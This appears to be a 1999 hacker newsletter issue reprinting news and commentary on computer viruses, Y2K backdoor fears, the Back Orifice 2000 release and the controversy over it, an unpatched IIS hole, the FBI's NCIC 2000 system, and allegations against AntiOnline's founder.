Ottawa has to get tougher with hackers who send file-destroying computer viruses over the Internet, the industry association representing Canada's computer industry said Thursday.

The mischievous makers who devise programs that destroy corporate computer files and cause entire high-tech systems to collapse are getting away with a slap on the wrist for a crime that is costing the Canadian economy millions annually, said Andre Gauthier, chair of the Information Technology Association of Canada and senior vice-president of LGS Group Inc.

"Too many people consider these things as funny. But sending a virus is just like launching a terrorist attack on a company," Gauthier said.

ITAC, which represents 1,300 Canadian software and hardware companies, sent a letter Thursday to federal Justice Minister Anne McLellan asking her to increase the penalties for this kind of crime and to work more closely with other law enforcement agencies globally to track down virus makers.

Over the past several months, the Chernobyl, Melissa and Worm-Explore.Zip viruses made headlines internationally as they attacked the computer systems of corporations and government agencies in many countries.

Viruses are programs that enter a computer system through the e-mail or other external links and then cause havoc in the network, everything from exploding fireworks on a person's computer screen to the elimination of stored files on the system's hard drive.

In many cases, these hackers are people who enjoy the intellectual challenge of writing. In other situations, they are only after the publicity these viruses can receive, causing people to treat these crimes as less dangerous.
"But (in the information age), a crime no longer requires a .45-calibre Magnum. We have to deal with these things in a far more serious manner. They do a lot of damage," said Robert Lendvai, vice-president of marketing at OLAP@Home Inc., an Ottawa-based software programmer.

For instance, one Ottawa public relations firm had to close its doors for one day to repair the damage from the Melissa virus, he said.

ITAC's Gauthier figured Canadian corporations and governments lose $100 million annually because of these computer bugs. That figure was extrapolated from the $1-billion US loss estimated to American corporations derived from an earlier U.S. study.

Companies are getting help in the form of more sophisticated virus detection programs, now "a basic protection" for any smart firm, said David Lynch, vice-president of sales and marketing of KyberPASS Corp., an Ottawa-based electronic commerce software maker.

These detection programs generally work by looking for indicators within a corporate computer system that change for an unexplained reason. In that case, the program will send a warning that you may have a problem.

"But viruses are always going to be with us," he said.

KyberPASS was hit by three viruses in the past year, two of which entered the system through the company's e-mail and one when someone in the corporation downloaded an outside file, Lynch said.

"It's computer vandalism. Some of it is paint on the walls. And some is like throwing eggs at the door," he said.

@HWA

05.0 Y2K Bug Fixes May Cause Other Problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Sure, the programmers who are busy patching up old COBOL code to correct the massive Y2K problem may leave in their own backdoors. Of course that is possible, but how widespread is this problem really? Is the claim of $1 billion lost accurate or just FUD? I guess there is no way to really know for sure.
MSNBC
http://www.msnbc.com/news/290746.asp

More fud and sensationalism....;

Beware the millennium bug repair
The people hired to root out the Y2K bug could give themselves the keys to billions of corporate dollars
By Jim Miklaszewski
NBC NEWS CORRESPONDENT

WASHINGTON, July 16 — Security experts believe that computer fraud, linked directly to the so-called Year 2000 computer bug, will cost America’s big business big money. In fact, one firm predicts that in a single computer theft, some American business will lose $1 billion. It could potentially be the biggest corporate heist in world history.

“CLEARLY, SOMEONE is going to be hit on their balance sheet pretty hard,” said Bob Mack, vice president of the Gartner Group.

Ironically, the companies themselves may be hiring these potential computer crooks without even knowing it. Most major firms are using outside consultants to rid their computer systems of any potential Y2K bugs. But to do that, these consultants are given access to the companies’ deepest, darkest, most sensitive computer secrets and codes — leaving the companies and their computers wide open to theft.

“They have to have access to your most critical systems. You’re essentially giving them the keys to the kingdom,” said Ira Winkler, chief of the president’s Security Advisors Group.

The consultants, it’s feared, can insert their own codes into a company computer — trapdoors — that would permit them to hack back into the system at will.

“They’re inserting malicious activity, if you will, into the code that will allow them to do things that the code was never allowed to do,” said Mike Higgins, of Para-Protect Services, of Alexandria, Va.

Once inside, the computer thieves could electronically steal money or the companies’ latest trade secrets, be it the latest cure for cancer or design for new sneakers, potentially worth billions of dollars.

“Why do people hack into computers today in the business world?” Higgins said.
“Because that’s where the money is.”

And global financial systems are largely electronically connected now, and the interconnection is only expected to increase.

“Y2K remediation, by definition, creates and increases the opportunity for theft and fraud,” said Joe Pucciarelli, a Gartner analyst, in a statement on the company’s advisory.

“Given the enormity of the Y2K task, the vast number of people assigned to fix the problem, and the element of human foibles, at least one significant theft is likely to occur in the next five years,” Pucciarelli said.

Corporations must keep a close eye on staffers and consultants working on Y2K projects, said Bob Mack, another Gartner analyst, in an interview.

“The point we’re making is that there are things corporations can do to limit fraud,” Mack said. All Y2K bug-fixing efforts should be audited by third parties if possible, and detailed records should be kept on all Y2K projects.

Once planted, these back doors could go undetected forever — leaving some companies vulnerable long after the Y2K New Year’s celebration.

Mario Seminerio of ZDNN contributed to this report.

@HWA

06.0 Security Fears are Slowing UK E-Commerce
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Fears over the lack of security on the internet are slowing the progression of e-commerce in the UK, said attendees of TheEcademy, an advisory group to the British government. This group feels that these fears over the lack of security on the net are unfounded and misplaced. One attendee was quoted as saying "There is no security problem." What world do these guys live on?

Tech Web
http://www.techweb.com/wire/story/TWB19990716S0018

Scary Security Stories Hinder E-Commerce
(07/16/99, 4:06 p.m. ET)
By Madeleine Acey, TechWeb

LONDON -- Unwarranted hype over the security risks of e-commerce has led to misplaced fear about setting up in Internet business.
This was the view of IT vendors, analysts, and lawyers who gathered in London on Thursday to create an advisory document for the U.K. government on how to spur reluctant British businesses into e-commerce.

The 50-member group, all part of TheEcademy -- an e-commerce education forum, also said regulation would be an inhibitor and had already held back progress.

"There is no security problem," said Frederick Wilson of Lloyds TSB banking group. "There's only one problem -- people don't understand. We have to convince customers it is secure."

Other delegates said people let technophobia cloud the issue and needed to realize e-commerce was no more insecure than any other type of business.

"All the security and payment issues we have, have always existed in business," said one.

"How secure is your shop or your head office?" said another.

EDI works globally and has been around for years without issues, a third pointed out.

Microsoft U.K. e-commerce business manager Peter Bell said Visa was the "biggest proponent" of scare stories. "They say there's 45 percent fraud on the Internet," he said.

But online businesses like Expedia sold $1 million worth of travel tickets last year without one security incident, said Durlacher European Internet Analyst Sarah Skinner.

A show of hands found most of the group felt the U.K. telecom industry and its regulation -- or lack of regulation -- was holding back e-commerce.

Bell said British Telecommunications' contracts only let customers run data at 64K over their lines. "People should ignore it, let BT sue you," he said.

Government regulation is supposed to ensure the near-monopoly BT operates fairly.

Many agreed e-commerce worked best when governments didn't try to legislate for it. "Our objective would be to take as much regulation out of the equation as possible," said TheEcademy chairman Thomas Power.
Russell Loarridge suggested the government publish a code of practice to prevent spamming -- people would only receive marketing e-mail if requested. Another delegate said the EU -- led by a British Labor politician -- had already voted for the opposite.

The group agreed the IT industry was partly to blame for resistance to e-commerce as it used language that was alien to many businesses.

They said the success stories -- and how they were achieved -- should be publicized to counteract the fear of credit card details being stolen, payments not being made, and systems falling over.

"We need people with the business experience to be visionaries to encourage the same sort of transition [as when businesses first moved from manual processes to computer systems]," one member of the discussion forum said.

"People want to know, how has someone else done it," another offered, suggesting TheEcademy publish boilerplate guides to adopting e-commerce.

A working document would be produced from the group's meeting, Power said, and be presented to the Department of Trade and Industry.

@HWA

07.0 More Defc0n than you can shake three sticks at
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Forbes: http://www.forbes.com/tool/html/99/jul/0716/feat2.htm

Defcon Live!
By Adam L. Penenberg

Dildog, a member of the hacker group Cult of the Dead Cow, is lounging in his hotel suite, a smile smeared on his face. Being Las Vegas in July, the temperature outside is 100 degrees, but Dildog is air-conditioned cool. The unveiling of his latest software upgrade for Back Orifice--a not-so-subtle dig at Microsoft's Back Office--was a success, a raucous party that had more in common with a heavy metal concert than a software release. A gaggle of groupies, most of them in their twenties and dressed in noir black, with tattoos, piercings and scraggly hair, wait for him.
They sit cross-legged on the carpet, availing themselves of a well-stocked minibar piled high with bottles of vodka, bourbon, whiskey.

Of the 3,000 hackers, crackers, geeks, "scene whores" (hacker groupies), computer security professionals, journalists, undercover cops and federal agents who attended this year's Defcon hacker convention, 2,000 of them crammed into a conference room at the Alexis Park Hotel to watch the "BO2K" release.

Last year, Cult of the Dead Cow had chosen Defcon to release the first version of its Back Orifice. Written by fellow Cult member Sir Dystic, it works on Windows 95 and 98 machines by secretly creating a backdoor so that a remote user can control all functions on those computers. The upgrade Dildog coded is designed to work with networks that run on Windows NT, and it hides itself extremely well.

While software makers, computer security companies, antivirus makers and law enforcement say the release of BO2K is just a way for hackers to legitimize illegal computer intrusions, Dildog claims he is just trying to point out potential problems with Microsoft's software. Computer security companies are "afraid to admit that their detection system is horribly and possibly irreparably flawed," he says. "[They] give people the impression their software 'raises the bar' against the average hacker. Unfortunately, this also fools people with really critical networks into thinking that this software is sufficient to protect them. People trusting this stuff to protect them from Trojan horses are in for a surprise."

Cult of the Dead Cow members didn't come all the way to Las Vegas to disappoint, and they didn't. They kicked off the conference with a laser-light show, culminating in a deafening electronic moo sound. The crowd roared.
Then, while Dildog and his associates explained their don't-blame-us-if-Microsoft-products-suck philosophy, a CD-ROM label was projected on the wall behind them, a cow head spinning and spinning. At the end of the presentation, Cult members flung some two dozen CD-ROMS containing the Back Orifice update. The crowd surged forward.

Antivirus makers and computer security company reps watched closely, hoping to later corral someone with a copy. The first one to crack the program would win bragging rights, their names in a press release, perhaps even a mention in some magazine or newspaper articles as heroes who thwarted the evil intentions of the Cult of the Dead Cow hacker gang.

An employee of ISS, the big-time computer-security company based in Atlanta, Ga. threw himself into the mob and somehow snagged a copy. Within 24 hours, the company would crack parts of the program and release an application that could identify it.

At the time, Dildog didn't know this, and even if he had he wouldn't have cared. In an earlier Internet conversation, an ISS employee approached him and asked how much of a bribe it would take for him to pass the company an advance copy of the software, he claims. As a joke, the Cult sent back a note saying it would take $1 million and a monster truck, the idea they ostensibly got from "Hack Heaven," the sham article written by former New Republic associate editor Stephen Glass. ISS denies the company ever offered money for the software.

Although ISS has been more than happy to play up the fact that it can detect the software, Dildog says he fully expected that companies would not only reverse engineer it, they would soon come up with a removal tool. That is why he released his software as "open source." That means hackers the world over can tweak the code to suit their needs.
For every new version that hits the Net, computer security companies will have to create new ways to counter it. Although antivirus makers have been pretty good at picking up polymorphic versions of the same program, it will be interesting to see what the overall impact of BO2K will be. Often, network administrators forget to apply the latest versions of antivirus software, or incorrectly configure parts of their network, leading to holes that would enable BO2K to fester.

Already, BO2K has made it on to some hacker sites, bugs and all. Some users say the program has a tendency to crash and some files were improperly coded. But in the next couple of weeks or so, Cult of the Dead Cow plans to fix any glitches and post the new and improved program on its web site.

From previous experience, Dildog knows that BO2K will then spread like a virus, morphing into perhaps dozens of different versions. The group claims it counted more than 300,000 downloads of the original Back Orifice, which ran solely on Windows 95 and 98 and was spread primarily by E-mail attachment. Who knows how many other copies were spread friend to friend, hacker to hacker, "cracker" to victim?

Back in his hotel suite, Dildog's cool is slightly interrupted. When told some hackers who had attended his BO2K launch thought the spectacle undermined his credibility and made him look arrogant, he sniffed, "I never said I wasn't arrogant. Besides, why shouldn't every software release be like a rock concert?"

(Though Mirco$crap did that in their presentations? - Ed)

@HWA

08.0 How to Look Like a Hacker
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Some cool pictures in a rather mainstream place that attempts to cover what it thinks is Hacker Fashion. There are pictures from Defcon of Sir Dystic, Dark Tangent, Niki, Redrasta, Dr. Byte, and the whole cDc crew. Pity they missed my blue hair.
Las Vegas Weekly
http://www.lasvegasweekly.com/departments/07_14_99/fashion_defcon.html

How to be a hacker ... or at least look like one
Written and photographed by Anonymous

I confess. In my younger daze I was a hacker. It was easier then. We worked on paper terminals that we accessed by sneaking into a local university library. We'd change grades, write stupid little programs and screw things up. We really didn't know what rules we were breaking. At that time, neither did the authorities.

Today's hackers are a different lot. They are really savvy about the rules and how the game is played. Depending upon your own definition of evil, they are either on the dark side or the good side. It's a perfect yin yang.

Wondering what today's generation of hackers looked like, I went down to Defcon VII held last weekend here in Vegas. What I saw didn't surprise me. In fact it scared me. The following is a checklist on how to at least pretend you're a hacker.

- Black t-shirts with esoteric statements, or corporate logos (but only if the shirt is free), or those oh-so-comfy thrift-store clothes.
- Sunglasses to protect your eyes against that big bright yellow thing that is in the sky during what is called "daylight hours".
- Black tribal tattoos to contrast against your skin made pasty white from years of not going out into the sun.
- A proper diet of pizza, beer, cigarettes and loads of caffeine.
- A cold hard stare for anyone trying to take your picture because you're trying to remain anonymous even though the authorities who would be interested in your picture already have really good snapshots of you. A quick draw to cover your face is also necessary.
- Strange jewelry, shoes, and backpacks.
- Icons of the dead and almost dead.
- That retro 20th century look.
- Anything that makes Bill Gates look like the devil.
- Come up with a cool cyber name like Death Veggy.

@HWA

09.0 AV Vendors Still Scrambling Over BO2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Space Rogue

Everyone wants a piece of the Anti BO2K press pie. Both Aladdin Knowledge Systems and BindView Development have announced products that claim to protect users from the malicious use of Back Orifice 2000. The BindView product looks like nothing more than a signature ID program, useless against an open source application such as BO2K. The Aladdin product actually looks interesting, claiming to trap BO2K and other malicious email attachments in a 'sandbox' and detecting attempts to modify system files. This method should protect against the numerous mutations that will undoubtedly appear.

Excite News - BindView
http://news.excite.com/news/bw/990715/tx-bindview

BindView Development - BO2K Advisory
http://www.bindview.com/security/advisory/bo2K.html

Excite News - Aladdin
http://news.excite.com/news/bw/990713/wa-aladdin-knowledge

eSafe - Aladdin's Security Product
http://www.esafe.com/

10.0 The Back Orifice 2000 Controversy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reprinted from HNN's Buffer Overflow with Eric's kind permission.

By: Eric Ruppenthal

Symantec, producers of Norton Anti-virus, along with many other anti-virus producing companies announced recently that it was classifying Back Orifice 2000 as a Trojan and or virus. This is a concerted effort to bar the competition of Cult of the Dead Cow in the network administration tool field. By using their anti-virus programs to keep computer users from using BO2K, these companies are engaging in unfair business tactics to keep a legitimate program from stealing the profits of their network administration tool programs. This creates a serious anti-trust problem.

Back Orifice 2000 was produced by Cult of the Dead Cow (cDc) as an actual legitimate tool to be used to remotely administer Microsoft OS computer networks.
It was introduced in Las Vegas on July 11, at DefCon 7. Since its official release to the public on July 14, every effort has been made to define this program not as an evil tool, but as something to be used in the real world of business. The program is free to any U.S. citizen who plans no exportation of it because of the encryption contained in the program.

Many of the companies that produce anti-virus programs also deal in the network administration tool arena. The applications these companies produce are similar in functionality to BO2K with the difference being cDc offers their program free of charge. The companies see this factor as having the potential to seriously undermine their profit margins.

So what do they do? They use a commonplace tool to remove this program as a threat; knowing full well that millions of computer systems in this country run anti-virus programs, including the networks this tool could be used on. They use this to their advantage by having it detect and label BO2K as a virus. This blatant attempt at monopolizing the network admin field thus blocks most attempts by any network administrator from using BO2K in a legitimate capacity without having to compromise virus protection.

Symantec produces a program called PcAnywhere. Another company that is a close ally of Symantec is Microsoft. Microsoft is currently involved in a government anti-trust suit. Microsoft also makes a network administration tool called Systems Management Server that is integrated within the Microsoft BackOffice Suite. BO2K uses a little known hole that Microsoft deliberately placed in its OS source code to run in a stealth mode. Many of the enterprise management tools such as SMS from Microsoft do stealth remote control.

Read the comparison of BO2K, Norton's PcAnywhere and Compaq's Carbon Copy 32 at http://www.bo2k.com/comparison.html

They all have a silent install option and they all have silent remote control.
SMS even has a configurator much like the BO2K wizard to configure the agent before sending it to the target machine. The technology of stealth monitoring and control was there way before BO2K. But these companies would have you believe that BO2K is the only tool inherently destructive towards computer systems because it is made by a well-known group of non-commercial programmers. What cDc has done is put it in everyone's face and built a technologically superior solution that is free and open source.

Any program has the potential to be misused. If there is a way for someone to exploit a hole in your computer's defenses, it will be found. Microsoft is fully aware of the problems associated with powerful remote administration. Their SMS administration software has similar problems, by their own admission. From their page describing SMS; http://www.microsoft.com/smsmgmt/techdetails/remote.asp

"Security of all the operations that Systems Management Server allows you to do on a client, remote control is possibly the most dangerous in terms of security. Once an administrator is remote controlling a client, he has as many rights and access to that machine as if he were sitting at it. Added to this, there is also the possibility of carrying out a remote control session without the user at the client being aware of it."

Microsoft's site goes on to say, "It is possible to configure a remote control from a state where there is never any visible or audible indication that a remote control session is under way. It has been made this flexible due to customer demands ranging from one end of the spectrum to the other. When configuring the options available in the Remote Tools Client Agent properties, due notice must also be taken of company policy and local laws about what level of unannounced and unacknowledged intrusion is permitted."
According to a press release by cDc, "In the past, Back Orifice has been used as a Trojan horse by script-kiddie crackers to annoy and sometimes harm Internet connected Windows machines. This is a fact of life with a tool that has the ability to be silently installed and can perform administration without end-user intervention. This, however, is not unique to Back Orifice. There are many Trojan horse programs out there, and many legitimate remote administration tools, that have the capability to perform quiet remote installations."

Their statement goes on to say, "We have designed Back Orifice 2000 to meet user demands and to provide the most powerful remote administration available for the Microsoft Windows platform. Many people don't like to see free software like Back Orifice being used in replacement for expensive commercial products. So, they throw around statements like 'the program is only a malicious tool', and 'It has no legitimate purpose.' The Microsoft Crypto API claims to provide 'strong encryption'. Of course, if you don't have the source code, you can't verify that this is true. We aren't taking that chance. Back Orifice 2000 encryption is proven strong, and we're not afraid to show you exactly how it's implemented."

cDc has produced a program that is to be used in a legitimate business environment by a network administrator to aid in the administration of the computers they manage. They want you to know exactly how legit Back Orifice really is, but these companies are trying to prevent this freely available tool from being released by using one of their own product line applications to suppress BO2K so that another of their products can flourish. Both Symantec and Microsoft's products stand to lose a good percentage of market shares if BO2K were allowed to be released free to the public and become a commonly used tool. All of these programs, not just BO2K, can be detrimental to any computer system if used in the wrong hands.
BO2K must be given a chance to prove itself a legitimate tool and taken off the virus definitions lists. The open-source model has provided Back Orifice 2000 with a more than legitimate position in the industry and Back Orifice 2000 will grow to encompass all of the features of currently existing commercial remote administration tools.

Says a member of cDc; "We're dedicated to empowering people with their technology."

Submitted by: Eric Ruppenthal
HFactorX International Organization

@HWA

11.0 Year Old IIS Hole Still Causing Problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

A major hole in IIS announced by Microsoft last year has still not been patched by most customers. Eight lines of code is all that is needed to take full control at the system level of major popular web sites. The problem is that under certain conditions a user can connect directly to MS Access through IIS, which then of course gives the attacker full system privileges.

MSNBC
http://www.msnbc.com/news/290621.asp

Microsoft - Old
http://www.microsoft.com/security/bulletins/ms98-004.asp

Microsoft - New
http://www.microsoft.com/security/bulletins/ms99-025.asp

MSNBC;

Year-old hole exposed big Web sites
Compaq, Dell, Compuserve and others failed to heed Microsoft security warning and were left vulnerable
By Bob Sullivan
MSNBC

July 19 — A security expert was able to demonstrate major vulnerabilities in big-name Web sites last week, including Dell Computer Corp., Compaq Computer Corp., PSINet, Compuserve and Nasdaq-Amex. The vulnerability, which was demonstrated to MSNBC, was simple but potentially devastating. It required as few as eight lines of computer code but could have exposed personal information, including credit card numbers.
THE HOLE WAS actually announced by Microsoft on July 17 of last year — confirming a long-held suspicion that even large-scale information technology departments are having a tough time keeping up with the work required to maintain Web site security.

The cat-and-mouse nature of security means Microsoft and other software vendors regularly issue bulletins with “patches” to security holes, or “exploits,” found and announced by hackers. As such recipes for hacking into sites make their way quickly through the hacking community, Web site administrators must meticulously follow each bulletin. In this case, many sites did not.

“It’s one thing when there’s a problem,” said Russ Cooper, who administers the popular NTBugTraq mailing list. Cooper publicized the flaw on his list Monday morning. “It’s another thing when companies know about something for a year and haven’t done anything.... These companies have just ignored Microsoft’s recommendation.”

The flaw was discovered a year ago, and Microsoft published a “fix” and added it to the security checklist for Windows NT administrators. (Microsoft is a partner in MSNBC.)

A new flavor of the same problem was discovered last week by Greg Gonzalez, vice president of Web services at ITE Inc., which hosts several e-commerce sites. He says his discovery meant that a hacker could write a simple eight-line program and gain administrative access to Web sites running Microsoft’s Internet Information Server Web server software — with no user name or password required. Sites that followed Microsoft’s instructions from a year ago would have been immune, but Gonzalez said about half the sites he checked were vulnerable.

“With a lot of exploits you see ‘professional’ hackers writing code,” he said.
“This exploit does not require anywhere near that level of expertise.”

This morning, Microsoft re-issued its security alert about the problem “to serve as a reminder about this vulnerability, to restate the threat and encourage system administrators to evaluate their systems.”

At the center of the problem, according to Cooper, is lack of due diligence on the part of some companies to protect consumers’ private information. “Lots of companies went to the trouble of putting together a privacy statement. That’s all well and good,” he said, “But if companies don’t have an effective way of dealing with patches, with problems, what good is a privacy statement?”

The problem is much more complicated than that, according to the chief technology officer at one of the big-name Web sites that was discovered to be vulnerable. “We get about 15-40 of these alerts every week,” the CTO, who asked not to be identified, told MSNBC. Despite staff who are dedicated to following up on security issues, lower-priority problems can slip through the cracks. “We’re not Fort Knox.... We rely on third parties to say whether they are yellow or red situations.” He says Microsoft downplayed the severity of the bug a year ago.

Several other companies impacted by this security flaw declined comment. Spokespersons for Compuserve and PSINet said no personal information is stored on their Web sites, so there was no real danger to consumers. Compaq would only confirm that its site had been vulnerable but said the hole was patched after Microsoft security experts contacted Compaq recently. A spokesman for Dell said personal information was not at risk because such data is password protected, encrypted, and stored “elsewhere on its site.”

“The net of it is when an issue arises, we need to be proactive to take care of our customers,” said Craig Beilinson, a product manager for Windows 2000 at Microsoft.
The security hole itself involves the use of Microsoft’s database product, Access, in combination with its Web server software, Internet Information Server (IIS). Instead of connecting to a Web page in the traditional manner, a malicious hacker can connect directly to the Access database. From there, the hacker by default gains “system privileges,” and using Visual Basic can execute any command the Web administrator could. That would include downloading a list of user names and passwords, and the ability to connect to any other computer which feeds information to the Web server — including a database of credit cards and other personal information.

Gonzalez, who found the new method last week while testing his own site for vulnerabilities, said the largest e-commerce sites may have an added layer of security that would have prevented easy access to critical data such as card numbers — perhaps storing such numbers on a different network, behind another user name and password. “The top 10 e-commerce sites may or may not have an additional layer,” he said. “But there’s a zillion other sites that aren’t going to have additional layers in place.”

@HWA

12.0 NCIC 2000 Now Online
     ~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by DaFed
     The FBI has announced a major new initiative in fighting crime, the National Crime Information Center 2000. This new system replaces the original NCIC, at a cost of $183.2 million, which was used since 1967. The NCIC 2000 indexes and cross references several different crime related databases such as those containing information on stolen guns, deported felons, missing persons and stolen vehicles. We sure hope that this version of NCIC is more secure than the last one.

     CNN
     http://www.cnn.com/TECH/computing/9907/19/system.idg/index.html

FBI turns on new crime-fighting system

July 19, 1999
Web posted at: 2:22 p.m. EDT (1822 GMT)

by Scott Tillett

From...
(IDG) -- FBI officials announced today that they have successfully rolled out a massive new computer system that state and local law enforcement officials will use to fight crime.

The new system, the National Crime Information Center 2000 -- like the original NCIC, which the FBI had used since 1967 -- allows crime fighters to search through 17 databases when investigating crimes or questioning criminal suspects. The databases include information on stolen guns, deported felons, missing persons and stolen vehicles, for example.

NCIC 2000 will allow law enforcement officials with special hardware and software to transmit suspects' fingerprints to confirm their identity and to see if the suspects are wanted for other crimes. It also will allow the officials to view mug shots to confirm identities -- a capability the original NCIC did not have.

Law enforcement officers also can use NCIC 2000 to identify relationships among information in the databases. For example, under the old NCIC, if someone stole a car and a gun as part of the same crime and if a law enforcement officer later stopped the car thief on the highway, the officer could use the system to find out easily that the car had been stolen. But he would not necessarily know that the car thief might also have a stolen gun. NCIC 2000 shows the connection, keeping related information on a crime linked together, FBI spokesman Stephen Fischer said.

The new NCIC 2000 also adds name-search functionality. For example, a search for the name "James" would return alternate spellings, such as "Jim" or "Jimmy," Fischer said.

NCIC 2000 went online after years of escalating costs and congressional finger-wagging. System architects originally envisioned NCIC 2000 costing about $80 million, but the final price was $183.2 million, Fischer said. The discrepancy between the original cost and the actual cost came in part because contractors originally were "overly ambitious" when estimating the project, Fischer said.
NCIC 2000 went live on July 11, but bugs in the system, as well as FBI attention on the capture of suspected railroad killer Angel Maturino Resendez, delayed the unveiling of the system, Fischer said. He added that bugs in NCIC 2000 were fixed by Monday evening. The bugs related to connectivity with the National Instant Criminal Background Check System, which is used for approving gun purchases. That system draws on NCIC 2000 and other databases to approve or disapprove gun purchases.

FBI officials will hold the formal ceremony unveiling NCIC 2000 next month in Clarksburg, W.Va.

@HWA

13.0 E-commerce Increases Security Risk
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Code Kid
     Companies engaged in e-commerce are 57 percent more likely to suffer an information security breach than those that don't do business online, according to a survey published in ICSA Inc.'s Information Security magazine. The survey found that companies conducting business online are 57 percent more likely to experience a proprietary information leak and 24 percent more likely to experience an unwanted intrusion into their systems.

     Information Security Magazine - 1999 Information Security Industry Survey
     http://www.infosecuritymag.com/july99/charts.html

@HWA

14.0 Cyberspace Relatively Safe
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Code Kid
     Obviously a story written without much research, John Kroll claims that cyberspace is relatively safe. While his article pretty much only covers fraud on eBay the overall tone would give most people the wrong impression of life in cyberspace.

     Cleveland Live
     http://www.cleveland.com/business/news/fm19kro.ssf

So far, cyberspace is reasonably safe

Monday, July 19, 1999

By JOHN KROLL
THE PLAIN DEALER

Robert J. Guest is one in a million. Or at least one in 10,000.
Guest, a 31-year-old Californian, pleaded guilty to fraud in a federal court in California last week, according to prosecutors. He admitted taking about $37,000 from bidders over eBay Inc.'s Internet auction site but never delivering the digital cameras, laptops and other merchandise he had promised.

Sounds like another Internet horror story, right? Like all the hackers who are compromising our nation's defense and the Postal Service plan to start charging everyone who uses e-mail.

Well, Internet auction fraud is like those threats - that is, it exists rarely, if at all. Almost every hack into a government computer has done nothing worse than apply some electronic graffiti. There is no government plan - that's none, zip, zero, zilch - to charge for e-mail. And fraud in Internet auctions is hard to find.

Even though Thom Mrozek, a spokesman for the U.S. attorney's office that prosecuted Guest, told Bloomberg News that the case "demonstrates that the buyer needs to beware, particularly in the anonymous realm of the Internet," he says this is not an epidemic. Guest's was only the second prosecution in the country involving online auction fraud, Mrozek said.

Of course, it could be the dirty dealing in the digital rooms of eBay is just flying under the radar. No federal prosecutor's going to go after some guy who rips off one or two buyers for maybe $50. Don't even ask about using state laws or small-claims court. As Parma Heights attorney Rodger A. Pelagalli told Plain Dealer technology reporter Chuck Melvin, if you get stung on eBay, your best weapon is likely to be a strongly worded letter.

But Melvin, who did this week's package of stories on online auctions, says it seems that even penny-ante crime is rare. Less than 0.01 percent of the millions of eBay trades produce fraud complaints to eBay itself, the site told the New York Department of Consumer Affairs this year. That's fewer than one in every 10,000 trades.
It sounds as if Diogenes should hang up his lamp and take his search for an honest man online. Headline news: Internet users don't cheat!

Let's not get carried away. Like the old bank robber Yellow Kid Weil, today's electronic thieves probably still go "where the money is" - and for all the millions of trades on eBay, the take per trade is fairly low.

But while we can't proclaim an Age of Innocence on the whole Internet, the low level of fraud at a big online auctioneer like eBay underlines the point Melvin makes in his report: If you've got anything you want to buy or sell, the Internet is now the place to be. Just watch out for uninvited Guests.

©1999 THE PLAIN DEALER. Used with permission

@HWA

15.0 AntiOnline Under Investigation
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by cult
     An article in the Ottawa Citizen details recent claims made by attrition.org about the activities and FBI investigation of AntiOnline founder John Vranesevich. Unfortunately this article has no comments from the FBI. John Vranesevich refused to discuss the matter with the reporter and is now threatening a lawsuit over the article.

     Ottawa Citizen
     http://www.ottawacitizen.com/hightech/990719/2623591.html

     Attrition.org - Negation
     http://www.attrition.org/negation/ottawa.html

     Late Update
     The Ottawa Citizen has either pulled or moved the above article. The folks at Attrition have been kind enough to archive a copy for your reading pleasure.

     Attrition.org - Spy vs Spy In Hacker Underworld
     http://www.attrition.org/~jericho/media/ottawa_citizen.spy_vs_spy_in_hacker_underworld

http://www.ottawacitizen.com/hightech/990719/2623591.html

The Ottawa Citizen Online
Business Page
Monday 19 July 1999

Spy vs. spy in the hacker underworld
Network security expert is under investigation for attacks on U.S. government Web sites

Bob Paquin
The Ottawa Citizen

In the murky world of hackers and crackers, appearances can be deceptive.
"White hat" good guys, working for software or security firms, have occasionally been caught moonlighting as "black hat" rogues. Such appears to be the case with John Vranesevich, a network security expert and founder of top-rated hacker Web site AntiOnline.

Mr. Vranesevich is currently under investigation by the FBI with regard to recent attacks on U.S. government Web sites. It is alleged that he may have employed hackers to target high profile sites in order to scoop the rest of the media with exclusive reporting. Mr. Vranesevich has denied the allegations.

Brian Martin, also under FBI investigation for hacking, recently released a report on his Web site (www.attrition.org/negation/special) which details a series of links between Mr. Vranesevich and an alleged member of the hacker group Masters of Downloading, which claimed responsibility for the U.S. Senate Web site hack earlier this month. Mr. Martin, who researches hacker culture through his Web site, claims to have been tracking questionable AntiOnline reporting over the past year.

Mr. Vranesevich, 20, has over the past couple of years become one of the most widely quoted and authoritative sources on hacking and security-related information. Begun in late 1994 as a 5-megabyte high school hobby Web site, AntiOnline has since grown into a multi-domain business venture. ABC News has described it as a "Rick's Cafe in the Casablanca world of hacking." Besides reporting on hacking news, the site offers a downloadable library of hacking software tools, archives of several hacker newsletters and journals, and copies of some of the hacked pages featured in reported stories.

While growing increasingly popular with the mainstream media, however, Mr. Vranesevich has slowly built up a number of enemies among the hacker underground. Spurred, perhaps, by an extensive FBI and U.S. Department of Justice hacker crackdown, which resulted in raids on 20 suspected hackers across six states, Mr.
Vranesevich declared a dramatic change of stance, distancing himself from the subjects he covers.

In a "Change in Mission" notice posted on his Web site, Mr. Vranesevich said: "Unfortunately, I've found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centres, and yes, people who have even attempted to sell data to individuals that presented themselves as being foreign terrorists ... Many times, I knew about these instances beforehand, and could have stopped them."

He also claimed to have been secretly working with the U.S. Air Force to develop a "profile of a hacker" for use in fighting "CyberCrime".

